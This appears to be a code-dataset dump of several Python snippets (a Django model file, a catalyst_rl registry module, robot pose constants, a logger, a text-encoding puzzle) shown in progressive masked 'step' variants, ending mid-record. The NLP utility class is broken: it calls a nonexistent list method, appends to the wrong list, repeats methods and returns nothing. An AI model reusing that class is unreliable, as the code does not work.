"step-3": "class NlpUtility:\n <mask token>\n\n def get_nouns(self, tokens):\n nouns = []\n for word, pos in tokens:\n if pos == 'NN':\n nouns.push(word)\n\n def get_verbs(self, tokens):\n verbs = []\n for word, pos in tokens:\n if pos == 'VB':\n nouns.push(word)\n\n def get_adjectives(self, tokens):\n nouns = []\n for word, pos in tokens:\n if pos == 'NN':\n nouns.push(word)\n\n def get_nouns(self, tokens):\n nouns = []\n for word, pos in tokens:\n if pos == 'NN':\n nouns.push(word)\n\n def get_nouns(self, tokens):\n nouns = []\n for word, pos in tokens:\n if pos == 'NN':\n nouns.push(word)\n",
"step-4": "class NlpUtility:\n \"\"\"\n\t\tUtility methods to get particular parts of speech from a token set\n\t\"\"\"\n\n def get_nouns(self, tokens):\n nouns = []\n for word, pos in tokens:\n if pos == 'NN':\n nouns.push(word)\n\n def get_verbs(self, tokens):\n verbs = []\n for word, pos in tokens:\n if pos == 'VB':\n nouns.push(word)\n\n def get_adjectives(self, tokens):\n nouns = []\n for word, pos in tokens:\n if pos == 'NN':\n nouns.push(word)\n\n def get_nouns(self, tokens):\n nouns = []\n for word, pos in tokens:\n if pos == 'NN':\n nouns.push(word)\n\n def get_nouns(self, tokens):\n nouns = []\n for word, pos in tokens:\n if pos == 'NN':\n nouns.push(word)\n",
"step-5": "class NlpUtility():\n\t\"\"\"\n\t\tUtility methods to get particular parts of speech from a token set\n\t\"\"\"\n\tdef get_nouns(self, tokens):\n\t\tnouns = []\n\t\tfor word, pos in tokens:\n\t\t\tif pos == \"NN\":\n\t\t\t\tnouns.push(word)\n\n\tdef get_verbs(self, tokens):\n\t\tverbs = []\n\t\tfor word, pos in tokens:\n\t\t\tif pos == \"VB\":\n\t\t\t\tnouns.push(word)\n\n\tdef get_adjectives(self, tokens):\n\t\tnouns = []\n\t\tfor word, pos in tokens:\n\t\t\tif pos == \"NN\":\n\t\t\t\tnouns.push(word)\n\n\tdef get_nouns(self, tokens):\n\t\tnouns = []\n\t\tfor word, pos in tokens:\n\t\t\tif pos == \"NN\":\n\t\t\t\tnouns.push(word)\n\n\tdef get_nouns(self, tokens):\n\t\tnouns = []\n\t\tfor word, pos in tokens:\n\t\t\tif pos == \"NN\":\n\t\t\t\tnouns.push(word)\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
from catalyst_rl.contrib.registry import (
Criterion, CRITERIONS, GRAD_CLIPPERS, Model, MODELS, Module, MODULES,
Optimizer, OPTIMIZERS, Sampler, SAMPLERS, Scheduler, SCHEDULERS, Transform,
TRANSFORMS
)
from catalyst_rl.core.registry import Callback, CALLBACKS
from catalyst_rl.utils.tools.registry import Registry
def _callbacks_loader(r: Registry):
from catalyst_rl.dl import callbacks as m
r.add_from_module(m)
CALLBACKS.late_add(_callbacks_loader)
__all__ = [
"Callback",
"Criterion",
"Optimizer",
"Scheduler",
"Module",
"Model",
"Sampler",
"Transform",
"CALLBACKS",
"CRITERIONS",
"GRAD_CLIPPERS",
"MODELS",
"MODULES",
"OPTIMIZERS",
"SAMPLERS",
"SCHEDULERS",
"TRANSFORMS",
]
|
normal
|
{
"blob_id": "09d13fe6b090850782feb601412cf135d497136f",
"index": 6206,
"step-1": "<mask token>\n\n\ndef _callbacks_loader(r: Registry):\n from catalyst_rl.dl import callbacks as m\n r.add_from_module(m)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef _callbacks_loader(r: Registry):\n from catalyst_rl.dl import callbacks as m\n r.add_from_module(m)\n\n\nCALLBACKS.late_add(_callbacks_loader)\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef _callbacks_loader(r: Registry):\n from catalyst_rl.dl import callbacks as m\n r.add_from_module(m)\n\n\nCALLBACKS.late_add(_callbacks_loader)\n__all__ = ['Callback', 'Criterion', 'Optimizer', 'Scheduler', 'Module',\n 'Model', 'Sampler', 'Transform', 'CALLBACKS', 'CRITERIONS',\n 'GRAD_CLIPPERS', 'MODELS', 'MODULES', 'OPTIMIZERS', 'SAMPLERS',\n 'SCHEDULERS', 'TRANSFORMS']\n",
"step-4": "from catalyst_rl.contrib.registry import Criterion, CRITERIONS, GRAD_CLIPPERS, Model, MODELS, Module, MODULES, Optimizer, OPTIMIZERS, Sampler, SAMPLERS, Scheduler, SCHEDULERS, Transform, TRANSFORMS\nfrom catalyst_rl.core.registry import Callback, CALLBACKS\nfrom catalyst_rl.utils.tools.registry import Registry\n\n\ndef _callbacks_loader(r: Registry):\n from catalyst_rl.dl import callbacks as m\n r.add_from_module(m)\n\n\nCALLBACKS.late_add(_callbacks_loader)\n__all__ = ['Callback', 'Criterion', 'Optimizer', 'Scheduler', 'Module',\n 'Model', 'Sampler', 'Transform', 'CALLBACKS', 'CRITERIONS',\n 'GRAD_CLIPPERS', 'MODELS', 'MODULES', 'OPTIMIZERS', 'SAMPLERS',\n 'SCHEDULERS', 'TRANSFORMS']\n",
"step-5": "from catalyst_rl.contrib.registry import (\n Criterion, CRITERIONS, GRAD_CLIPPERS, Model, MODELS, Module, MODULES,\n Optimizer, OPTIMIZERS, Sampler, SAMPLERS, Scheduler, SCHEDULERS, Transform,\n TRANSFORMS\n)\nfrom catalyst_rl.core.registry import Callback, CALLBACKS\nfrom catalyst_rl.utils.tools.registry import Registry\n\n\ndef _callbacks_loader(r: Registry):\n from catalyst_rl.dl import callbacks as m\n r.add_from_module(m)\n\n\nCALLBACKS.late_add(_callbacks_loader)\n\n__all__ = [\n \"Callback\",\n \"Criterion\",\n \"Optimizer\",\n \"Scheduler\",\n \"Module\",\n \"Model\",\n \"Sampler\",\n \"Transform\",\n \"CALLBACKS\",\n \"CRITERIONS\",\n \"GRAD_CLIPPERS\",\n \"MODELS\",\n \"MODULES\",\n \"OPTIMIZERS\",\n \"SAMPLERS\",\n \"SCHEDULERS\",\n \"TRANSFORMS\",\n]\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
# -*- utf-8 -*-
from django.db import models
class FieldsTest(models.Model):
pub_date = models.DateTimeField()
mod_date = models.DateTimeField()
class BigS(models.Model):
s = models.SlugField(max_length=255)
class Foo(models.Model):
a = models.CharField(max_length=10)
d = models.DecimalField(max_digits=5, decimal_places=3)
class Bar(models.Model):
b = models.CharField(max_length=10)
a = models.ForeignKey(Foo, related_name='bars', on_delete=models.CASCADE)
class DTModel(models.Model):
name = models.CharField(max_length=32)
start_datetime = models.DateTimeField(null=True, blank=True)
end_datetime = models.DateTimeField(null=True, blank=True)
start_date = models.DateField(null=True, blank=True)
end_date = models.DateField(null=True, blank=True)
start_time = models.TimeField(null=True, blank=True)
end_time = models.TimeField(null=True, blank=True)
duration = models.DurationField(null=True, blank=True)
def __str__(self):
return 'DTModel({0})'.format(self.name)
|
normal
|
{
"blob_id": "d6cfe7132855d832d8fd1ea9ca9760bd22109a92",
"index": 1893,
"step-1": "<mask token>\n\n\nclass Bar(models.Model):\n b = models.CharField(max_length=10)\n a = models.ForeignKey(Foo, related_name='bars', on_delete=models.CASCADE)\n\n\nclass DTModel(models.Model):\n name = models.CharField(max_length=32)\n start_datetime = models.DateTimeField(null=True, blank=True)\n end_datetime = models.DateTimeField(null=True, blank=True)\n start_date = models.DateField(null=True, blank=True)\n end_date = models.DateField(null=True, blank=True)\n start_time = models.TimeField(null=True, blank=True)\n end_time = models.TimeField(null=True, blank=True)\n duration = models.DurationField(null=True, blank=True)\n\n def __str__(self):\n return 'DTModel({0})'.format(self.name)\n",
"step-2": "<mask token>\n\n\nclass Foo(models.Model):\n <mask token>\n <mask token>\n\n\nclass Bar(models.Model):\n b = models.CharField(max_length=10)\n a = models.ForeignKey(Foo, related_name='bars', on_delete=models.CASCADE)\n\n\nclass DTModel(models.Model):\n name = models.CharField(max_length=32)\n start_datetime = models.DateTimeField(null=True, blank=True)\n end_datetime = models.DateTimeField(null=True, blank=True)\n start_date = models.DateField(null=True, blank=True)\n end_date = models.DateField(null=True, blank=True)\n start_time = models.TimeField(null=True, blank=True)\n end_time = models.TimeField(null=True, blank=True)\n duration = models.DurationField(null=True, blank=True)\n\n def __str__(self):\n return 'DTModel({0})'.format(self.name)\n",
"step-3": "<mask token>\n\n\nclass BigS(models.Model):\n <mask token>\n\n\nclass Foo(models.Model):\n a = models.CharField(max_length=10)\n d = models.DecimalField(max_digits=5, decimal_places=3)\n\n\nclass Bar(models.Model):\n b = models.CharField(max_length=10)\n a = models.ForeignKey(Foo, related_name='bars', on_delete=models.CASCADE)\n\n\nclass DTModel(models.Model):\n name = models.CharField(max_length=32)\n start_datetime = models.DateTimeField(null=True, blank=True)\n end_datetime = models.DateTimeField(null=True, blank=True)\n start_date = models.DateField(null=True, blank=True)\n end_date = models.DateField(null=True, blank=True)\n start_time = models.TimeField(null=True, blank=True)\n end_time = models.TimeField(null=True, blank=True)\n duration = models.DurationField(null=True, blank=True)\n\n def __str__(self):\n return 'DTModel({0})'.format(self.name)\n",
"step-4": "<mask token>\n\n\nclass FieldsTest(models.Model):\n <mask token>\n <mask token>\n\n\nclass BigS(models.Model):\n s = models.SlugField(max_length=255)\n\n\nclass Foo(models.Model):\n a = models.CharField(max_length=10)\n d = models.DecimalField(max_digits=5, decimal_places=3)\n\n\nclass Bar(models.Model):\n b = models.CharField(max_length=10)\n a = models.ForeignKey(Foo, related_name='bars', on_delete=models.CASCADE)\n\n\nclass DTModel(models.Model):\n name = models.CharField(max_length=32)\n start_datetime = models.DateTimeField(null=True, blank=True)\n end_datetime = models.DateTimeField(null=True, blank=True)\n start_date = models.DateField(null=True, blank=True)\n end_date = models.DateField(null=True, blank=True)\n start_time = models.TimeField(null=True, blank=True)\n end_time = models.TimeField(null=True, blank=True)\n duration = models.DurationField(null=True, blank=True)\n\n def __str__(self):\n return 'DTModel({0})'.format(self.name)\n",
"step-5": "# -*- utf-8 -*-\n\nfrom django.db import models\n\n\nclass FieldsTest(models.Model):\n pub_date = models.DateTimeField()\n mod_date = models.DateTimeField()\n\n\nclass BigS(models.Model):\n s = models.SlugField(max_length=255)\n\n\nclass Foo(models.Model):\n a = models.CharField(max_length=10)\n d = models.DecimalField(max_digits=5, decimal_places=3)\n\n\nclass Bar(models.Model):\n b = models.CharField(max_length=10)\n a = models.ForeignKey(Foo, related_name='bars', on_delete=models.CASCADE)\n\n\nclass DTModel(models.Model):\n name = models.CharField(max_length=32)\n start_datetime = models.DateTimeField(null=True, blank=True)\n end_datetime = models.DateTimeField(null=True, blank=True)\n start_date = models.DateField(null=True, blank=True)\n end_date = models.DateField(null=True, blank=True)\n start_time = models.TimeField(null=True, blank=True)\n end_time = models.TimeField(null=True, blank=True)\n duration = models.DurationField(null=True, blank=True)\n\n def __str__(self):\n return 'DTModel({0})'.format(self.name)\n",
"step-ids": [
5,
6,
8,
10,
13
]
}
|
[
5,
6,
8,
10,
13
] |
# import visual_servoing_utils_main as utils
from autolab_core import rigid_transformations as rt
from yumipy import YuMiState
class YumiConstants:
T_gripper_gripperV = rt.RigidTransform(rotation=[[-1, 0, 0], [0, 1, 0], [0, 0, -1]],
from_frame='gripper', to_frame='obj')
T_rightH_yumi_1 = rt.RigidTransform(rotation=[[0, 0, 1], [1, 0, 0], [0, 1, 0]],
translation=[0.6256, -0.15060002, 0.3616],
from_frame='home', to_frame='yumi')
T_rightH_yumi_2 = rt.RigidTransform(rotation=[[0, 0, 1], [1, 0, 0], [0, 1, 0]],
translation=[0.6256 - 0.1, -0.15060002 + 0.1, 0.3616],
from_frame='home', to_frame='yumi')
T_rightH_yumi_3 = rt.RigidTransform(rotation=[[0, 0, 1], [1, 0, 0], [0, 1, 0]],
translation=[0.6256 - 0.1, -0.15060002 + 0.1, 0.3616 - 0.05],
from_frame='home', to_frame='yumi')
T_leftH_yumi_1 = rt.RigidTransform(rotation=[[1, 0, 0], [0, 0, -1], [0, 1, 0]],
translation=[0.52070004, 0.07340001, 0.3574],
from_frame='home', to_frame='yumi')
T_leftH_yumi_2 = rt.RigidTransform(rotation=[[1, 0, 0], [0, 0, -1], [0, 1, 0]],
translation=[0.67080003 - 0.15, -0.12650001 + 0.2, 0.35720003],
from_frame='home', to_frame='yumi')
T_board_yumi = rt.RigidTransform(translation=[0.3984, 0, 0.0837],
from_frame='board', to_frame='yumi')
board_center = rt.RigidTransform(rotation=[[-1, 0, 0], [0, 1, 0], [0, 0, -1]],
translation=[0.42971, -0.004, -0.057],
from_frame='yumi', to_frame='world')
T_rightH_yumi = rt.RigidTransform(rotation=[[-1, 0, 0], [0, 1, 0], [0, 0, -1]],
translation=[0.3984, 0 - 8 * 0.0375, 0.0837],
from_frame='home', to_frame='yumi')
T_leftH_yumi = rt.RigidTransform(rotation=[[-1, 0, 0], [0, 1, 0], [0, 0, -1]],
translation=[0.3984, 0 + 8 * 0.0375, 0.0837],
# translation=[0.3984, 0 + 8*0.0375, 0.0837],
from_frame='home', to_frame='yumi')
right_threading_home = YuMiState([101.34, -83.3, 54.01, -44.34, -82.32, -26.22, -76.76])
left_threading_home = YuMiState([-74.73, -70.63, 9.62, 15.86, 65.74, -169.18, 50.61])
right_pickup_home = YuMiState([80.92, -118.47, 39.2, -139.35, 107.91, 4.83, -26.93])
left_pickup_home = YuMiState([-75.32, -114.45, 37.59, 134.52, 102.66, -8.73, 42.77])
|
normal
|
{
"blob_id": "34c81b9318d978305748d413c869a86ee6709e2c",
"index": 996,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass YumiConstants:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass YumiConstants:\n T_gripper_gripperV = rt.RigidTransform(rotation=[[-1, 0, 0], [0, 1, 0],\n [0, 0, -1]], from_frame='gripper', to_frame='obj')\n T_rightH_yumi_1 = rt.RigidTransform(rotation=[[0, 0, 1], [1, 0, 0], [0,\n 1, 0]], translation=[0.6256, -0.15060002, 0.3616], from_frame=\n 'home', to_frame='yumi')\n T_rightH_yumi_2 = rt.RigidTransform(rotation=[[0, 0, 1], [1, 0, 0], [0,\n 1, 0]], translation=[0.6256 - 0.1, -0.15060002 + 0.1, 0.3616],\n from_frame='home', to_frame='yumi')\n T_rightH_yumi_3 = rt.RigidTransform(rotation=[[0, 0, 1], [1, 0, 0], [0,\n 1, 0]], translation=[0.6256 - 0.1, -0.15060002 + 0.1, 0.3616 - 0.05\n ], from_frame='home', to_frame='yumi')\n T_leftH_yumi_1 = rt.RigidTransform(rotation=[[1, 0, 0], [0, 0, -1], [0,\n 1, 0]], translation=[0.52070004, 0.07340001, 0.3574], from_frame=\n 'home', to_frame='yumi')\n T_leftH_yumi_2 = rt.RigidTransform(rotation=[[1, 0, 0], [0, 0, -1], [0,\n 1, 0]], translation=[0.67080003 - 0.15, -0.12650001 + 0.2, \n 0.35720003], from_frame='home', to_frame='yumi')\n T_board_yumi = rt.RigidTransform(translation=[0.3984, 0, 0.0837],\n from_frame='board', to_frame='yumi')\n board_center = rt.RigidTransform(rotation=[[-1, 0, 0], [0, 1, 0], [0, 0,\n -1]], translation=[0.42971, -0.004, -0.057], from_frame='yumi',\n to_frame='world')\n T_rightH_yumi = rt.RigidTransform(rotation=[[-1, 0, 0], [0, 1, 0], [0, \n 0, -1]], translation=[0.3984, 0 - 8 * 0.0375, 0.0837], from_frame=\n 'home', to_frame='yumi')\n T_leftH_yumi = rt.RigidTransform(rotation=[[-1, 0, 0], [0, 1, 0], [0, 0,\n -1]], translation=[0.3984, 0 + 8 * 0.0375, 0.0837], from_frame=\n 'home', to_frame='yumi')\n right_threading_home = YuMiState([101.34, -83.3, 54.01, -44.34, -82.32,\n -26.22, -76.76])\n left_threading_home = YuMiState([-74.73, -70.63, 9.62, 15.86, 65.74, -\n 169.18, 50.61])\n right_pickup_home = YuMiState([80.92, -118.47, 39.2, -139.35, 107.91, \n 4.83, -26.93])\n left_pickup_home = YuMiState([-75.32, -114.45, 37.59, 134.52, 102.66, -\n 8.73, 42.77])\n",
"step-4": "from autolab_core import rigid_transformations as rt\nfrom yumipy import YuMiState\n\n\nclass YumiConstants:\n T_gripper_gripperV = rt.RigidTransform(rotation=[[-1, 0, 0], [0, 1, 0],\n [0, 0, -1]], from_frame='gripper', to_frame='obj')\n T_rightH_yumi_1 = rt.RigidTransform(rotation=[[0, 0, 1], [1, 0, 0], [0,\n 1, 0]], translation=[0.6256, -0.15060002, 0.3616], from_frame=\n 'home', to_frame='yumi')\n T_rightH_yumi_2 = rt.RigidTransform(rotation=[[0, 0, 1], [1, 0, 0], [0,\n 1, 0]], translation=[0.6256 - 0.1, -0.15060002 + 0.1, 0.3616],\n from_frame='home', to_frame='yumi')\n T_rightH_yumi_3 = rt.RigidTransform(rotation=[[0, 0, 1], [1, 0, 0], [0,\n 1, 0]], translation=[0.6256 - 0.1, -0.15060002 + 0.1, 0.3616 - 0.05\n ], from_frame='home', to_frame='yumi')\n T_leftH_yumi_1 = rt.RigidTransform(rotation=[[1, 0, 0], [0, 0, -1], [0,\n 1, 0]], translation=[0.52070004, 0.07340001, 0.3574], from_frame=\n 'home', to_frame='yumi')\n T_leftH_yumi_2 = rt.RigidTransform(rotation=[[1, 0, 0], [0, 0, -1], [0,\n 1, 0]], translation=[0.67080003 - 0.15, -0.12650001 + 0.2, \n 0.35720003], from_frame='home', to_frame='yumi')\n T_board_yumi = rt.RigidTransform(translation=[0.3984, 0, 0.0837],\n from_frame='board', to_frame='yumi')\n board_center = rt.RigidTransform(rotation=[[-1, 0, 0], [0, 1, 0], [0, 0,\n -1]], translation=[0.42971, -0.004, -0.057], from_frame='yumi',\n to_frame='world')\n T_rightH_yumi = rt.RigidTransform(rotation=[[-1, 0, 0], [0, 1, 0], [0, \n 0, -1]], translation=[0.3984, 0 - 8 * 0.0375, 0.0837], from_frame=\n 'home', to_frame='yumi')\n T_leftH_yumi = rt.RigidTransform(rotation=[[-1, 0, 0], [0, 1, 0], [0, 0,\n -1]], translation=[0.3984, 0 + 8 * 0.0375, 0.0837], from_frame=\n 'home', to_frame='yumi')\n right_threading_home = YuMiState([101.34, -83.3, 54.01, -44.34, -82.32,\n -26.22, -76.76])\n left_threading_home = YuMiState([-74.73, -70.63, 9.62, 15.86, 65.74, -\n 169.18, 50.61])\n right_pickup_home = YuMiState([80.92, -118.47, 39.2, -139.35, 107.91, \n 4.83, -26.93])\n left_pickup_home = YuMiState([-75.32, -114.45, 37.59, 134.52, 102.66, -\n 8.73, 42.77])\n",
"step-5": "# import visual_servoing_utils_main as utils\nfrom autolab_core import rigid_transformations as rt\nfrom yumipy import YuMiState\n\nclass YumiConstants:\n\n T_gripper_gripperV = rt.RigidTransform(rotation=[[-1, 0, 0], [0, 1, 0], [0, 0, -1]],\n from_frame='gripper', to_frame='obj')\n\n T_rightH_yumi_1 = rt.RigidTransform(rotation=[[0, 0, 1], [1, 0, 0], [0, 1, 0]],\n translation=[0.6256, -0.15060002, 0.3616],\n from_frame='home', to_frame='yumi')\n\n T_rightH_yumi_2 = rt.RigidTransform(rotation=[[0, 0, 1], [1, 0, 0], [0, 1, 0]],\n translation=[0.6256 - 0.1, -0.15060002 + 0.1, 0.3616],\n from_frame='home', to_frame='yumi')\n\n T_rightH_yumi_3 = rt.RigidTransform(rotation=[[0, 0, 1], [1, 0, 0], [0, 1, 0]],\n translation=[0.6256 - 0.1, -0.15060002 + 0.1, 0.3616 - 0.05],\n from_frame='home', to_frame='yumi')\n\n T_leftH_yumi_1 = rt.RigidTransform(rotation=[[1, 0, 0], [0, 0, -1], [0, 1, 0]],\n translation=[0.52070004, 0.07340001, 0.3574],\n from_frame='home', to_frame='yumi')\n\n T_leftH_yumi_2 = rt.RigidTransform(rotation=[[1, 0, 0], [0, 0, -1], [0, 1, 0]],\n translation=[0.67080003 - 0.15, -0.12650001 + 0.2, 0.35720003],\n from_frame='home', to_frame='yumi')\n\n T_board_yumi = rt.RigidTransform(translation=[0.3984, 0, 0.0837],\n from_frame='board', to_frame='yumi')\n\n\n board_center = rt.RigidTransform(rotation=[[-1, 0, 0], [0, 1, 0], [0, 0, -1]],\n translation=[0.42971, -0.004, -0.057],\n from_frame='yumi', to_frame='world')\n\n T_rightH_yumi = rt.RigidTransform(rotation=[[-1, 0, 0], [0, 1, 0], [0, 0, -1]],\n translation=[0.3984, 0 - 8 * 0.0375, 0.0837],\n from_frame='home', to_frame='yumi')\n\n T_leftH_yumi = rt.RigidTransform(rotation=[[-1, 0, 0], [0, 1, 0], [0, 0, -1]],\n translation=[0.3984, 0 + 8 * 0.0375, 0.0837],\n # translation=[0.3984, 0 + 8*0.0375, 0.0837],\n from_frame='home', to_frame='yumi')\n\n right_threading_home = YuMiState([101.34, -83.3, 54.01, -44.34, -82.32, -26.22, -76.76])\n left_threading_home = YuMiState([-74.73, -70.63, 9.62, 15.86, 65.74, -169.18, 50.61])\n\n right_pickup_home = YuMiState([80.92, -118.47, 39.2, -139.35, 107.91, 4.83, -26.93])\n left_pickup_home = YuMiState([-75.32, -114.45, 37.59, 134.52, 102.66, -8.73, 42.77])\n\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from math import sqrt, ceil
def encode_s(s):
encoded_s = ''
s_with_no_spaces = s.replace(' ', '')
step = ceil(sqrt(len(s_with_no_spaces)))
for j in range(0, step):
i = j
while i < len(s_with_no_spaces):
encoded_s = encoded_s + s_with_no_spaces[i]
i += step
if j != step - 1:
encoded_s = encoded_s + ' '
return encoded_s
def decode_s(s):
arr = s.split(' ')
decoded_s = ''
for j in range(0, len(arr[0])):
for word in arr:
if len(word) > j:
decoded_s = decoded_s + word[j]
return decoded_s
def TheRabbitsFoot(s, encode):
if encode:
return encode_s(s)
return decode_s(s)
|
normal
|
{
"blob_id": "a3ed47c285b26dca452fa192eb354a21a78b8424",
"index": 4632,
"step-1": "<mask token>\n\n\ndef TheRabbitsFoot(s, encode):\n if encode:\n return encode_s(s)\n return decode_s(s)\n",
"step-2": "<mask token>\n\n\ndef decode_s(s):\n arr = s.split(' ')\n decoded_s = ''\n for j in range(0, len(arr[0])):\n for word in arr:\n if len(word) > j:\n decoded_s = decoded_s + word[j]\n return decoded_s\n\n\ndef TheRabbitsFoot(s, encode):\n if encode:\n return encode_s(s)\n return decode_s(s)\n",
"step-3": "<mask token>\n\n\ndef encode_s(s):\n encoded_s = ''\n s_with_no_spaces = s.replace(' ', '')\n step = ceil(sqrt(len(s_with_no_spaces)))\n for j in range(0, step):\n i = j\n while i < len(s_with_no_spaces):\n encoded_s = encoded_s + s_with_no_spaces[i]\n i += step\n if j != step - 1:\n encoded_s = encoded_s + ' '\n return encoded_s\n\n\ndef decode_s(s):\n arr = s.split(' ')\n decoded_s = ''\n for j in range(0, len(arr[0])):\n for word in arr:\n if len(word) > j:\n decoded_s = decoded_s + word[j]\n return decoded_s\n\n\ndef TheRabbitsFoot(s, encode):\n if encode:\n return encode_s(s)\n return decode_s(s)\n",
"step-4": "from math import sqrt, ceil\n\n\ndef encode_s(s):\n encoded_s = ''\n s_with_no_spaces = s.replace(' ', '')\n step = ceil(sqrt(len(s_with_no_spaces)))\n for j in range(0, step):\n i = j\n while i < len(s_with_no_spaces):\n encoded_s = encoded_s + s_with_no_spaces[i]\n i += step\n if j != step - 1:\n encoded_s = encoded_s + ' '\n return encoded_s\n\n\ndef decode_s(s):\n arr = s.split(' ')\n decoded_s = ''\n for j in range(0, len(arr[0])):\n for word in arr:\n if len(word) > j:\n decoded_s = decoded_s + word[j]\n return decoded_s\n\n\ndef TheRabbitsFoot(s, encode):\n if encode:\n return encode_s(s)\n return decode_s(s)\n",
"step-5": null,
"step-ids": [
1,
2,
3,
4
]
}
|
[
1,
2,
3,
4
] |
# -*- coding: utf-8 -*-
"""
A customised logger for this project for logging to the file and console
Created on 29/07/2022
@author: PNimbhore
"""
# imports
import os
import logging
class Logger:
"""
A custom logger which will take care
of logging to console and file.
"""
def __init__(self, filepath):
"""
Constructor
:param filepath:
"""
self.filepath = filepath
self.logger = logging.getLogger('util')
self.logger.setLevel(logging.DEBUG)
self._formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
# file handler
file_handller = logging.FileHandler(os.path.join(self.filepath), 'a')
file_handller.setLevel(logging.DEBUG)
file_handller.setFormatter(self._formatter)
self.logger.addHandler(file_handller)
# console handler
con_handler = logging.StreamHandler()
con_handler.setLevel(logging.ERROR)
con_handler.setFormatter(self._formatter)
self.logger.addHandler(con_handler)
log_file = "slb_config.log"
logger = Logger(log_file).logger
|
normal
|
{
"blob_id": "45d57f8392b89776f9349c32b4bb2fa71a4aaa83",
"index": 8610,
"step-1": "<mask token>\n\n\nclass Logger:\n <mask token>\n\n def __init__(self, filepath):\n \"\"\"\n Constructor\n :param filepath:\n \"\"\"\n self.filepath = filepath\n self.logger = logging.getLogger('util')\n self.logger.setLevel(logging.DEBUG)\n self._formatter = logging.Formatter(\n '%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n file_handller = logging.FileHandler(os.path.join(self.filepath), 'a')\n file_handller.setLevel(logging.DEBUG)\n file_handller.setFormatter(self._formatter)\n self.logger.addHandler(file_handller)\n con_handler = logging.StreamHandler()\n con_handler.setLevel(logging.ERROR)\n con_handler.setFormatter(self._formatter)\n self.logger.addHandler(con_handler)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Logger:\n \"\"\"\n A custom logger which will take care\n of logging to console and file.\n \"\"\"\n\n def __init__(self, filepath):\n \"\"\"\n Constructor\n :param filepath:\n \"\"\"\n self.filepath = filepath\n self.logger = logging.getLogger('util')\n self.logger.setLevel(logging.DEBUG)\n self._formatter = logging.Formatter(\n '%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n file_handller = logging.FileHandler(os.path.join(self.filepath), 'a')\n file_handller.setLevel(logging.DEBUG)\n file_handller.setFormatter(self._formatter)\n self.logger.addHandler(file_handller)\n con_handler = logging.StreamHandler()\n con_handler.setLevel(logging.ERROR)\n con_handler.setFormatter(self._formatter)\n self.logger.addHandler(con_handler)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Logger:\n \"\"\"\n A custom logger which will take care\n of logging to console and file.\n \"\"\"\n\n def __init__(self, filepath):\n \"\"\"\n Constructor\n :param filepath:\n \"\"\"\n self.filepath = filepath\n self.logger = logging.getLogger('util')\n self.logger.setLevel(logging.DEBUG)\n self._formatter = logging.Formatter(\n '%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n file_handller = logging.FileHandler(os.path.join(self.filepath), 'a')\n file_handller.setLevel(logging.DEBUG)\n file_handller.setFormatter(self._formatter)\n self.logger.addHandler(file_handller)\n con_handler = logging.StreamHandler()\n con_handler.setLevel(logging.ERROR)\n con_handler.setFormatter(self._formatter)\n self.logger.addHandler(con_handler)\n\n\nlog_file = 'slb_config.log'\nlogger = Logger(log_file).logger\n",
"step-4": "<mask token>\nimport os\nimport logging\n\n\nclass Logger:\n \"\"\"\n A custom logger which will take care\n of logging to console and file.\n \"\"\"\n\n def __init__(self, filepath):\n \"\"\"\n Constructor\n :param filepath:\n \"\"\"\n self.filepath = filepath\n self.logger = logging.getLogger('util')\n self.logger.setLevel(logging.DEBUG)\n self._formatter = logging.Formatter(\n '%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n file_handller = logging.FileHandler(os.path.join(self.filepath), 'a')\n file_handller.setLevel(logging.DEBUG)\n file_handller.setFormatter(self._formatter)\n self.logger.addHandler(file_handller)\n con_handler = logging.StreamHandler()\n con_handler.setLevel(logging.ERROR)\n con_handler.setFormatter(self._formatter)\n self.logger.addHandler(con_handler)\n\n\nlog_file = 'slb_config.log'\nlogger = Logger(log_file).logger\n",
"step-5": "# -*- coding: utf-8 -*-\n\"\"\"\nA customised logger for this project for logging to the file and console\nCreated on 29/07/2022\n@author: PNimbhore\n\"\"\"\n# imports\nimport os\nimport logging\n\n\nclass Logger:\n \"\"\"\n A custom logger which will take care\n of logging to console and file.\n \"\"\"\n def __init__(self, filepath):\n \"\"\"\n Constructor\n :param filepath:\n \"\"\"\n self.filepath = filepath\n self.logger = logging.getLogger('util')\n self.logger.setLevel(logging.DEBUG)\n self._formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n # file handler\n file_handller = logging.FileHandler(os.path.join(self.filepath), 'a')\n file_handller.setLevel(logging.DEBUG)\n file_handller.setFormatter(self._formatter)\n self.logger.addHandler(file_handller)\n # console handler\n con_handler = logging.StreamHandler()\n con_handler.setLevel(logging.ERROR)\n con_handler.setFormatter(self._formatter)\n self.logger.addHandler(con_handler)\n\n\nlog_file = \"slb_config.log\"\nlogger = Logger(log_file).logger\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
#-*- coding: utf-8 -*-
s = "123"
try:
print(int(s) + 1)
print(int(s) / 1)
except ValueError as ve:
print("ValueError occurs!!!", ve)
except ZeroDivisionError as e:
print("ValueError occurs!!!", e)
except :
print("Error occurs!!!")
else:
print("elseeeeeeeeeeeeeee")
finally:
print("ABCDEFG")
# try:
# # 예외 발생 가능 코드들
# except:
# # 예외시 처리될 구문
# except:
# pass #씹겠다?!
# else:
# #예외가 없을 경우 실행되는 부분
# finally:
# #예외가 있던 없던 실행되는 부분
|
normal
|
{
"blob_id": "1bf79319613ca1454f3a9ed21068bd899616395c",
"index": 624,
"step-1": "<mask token>\n",
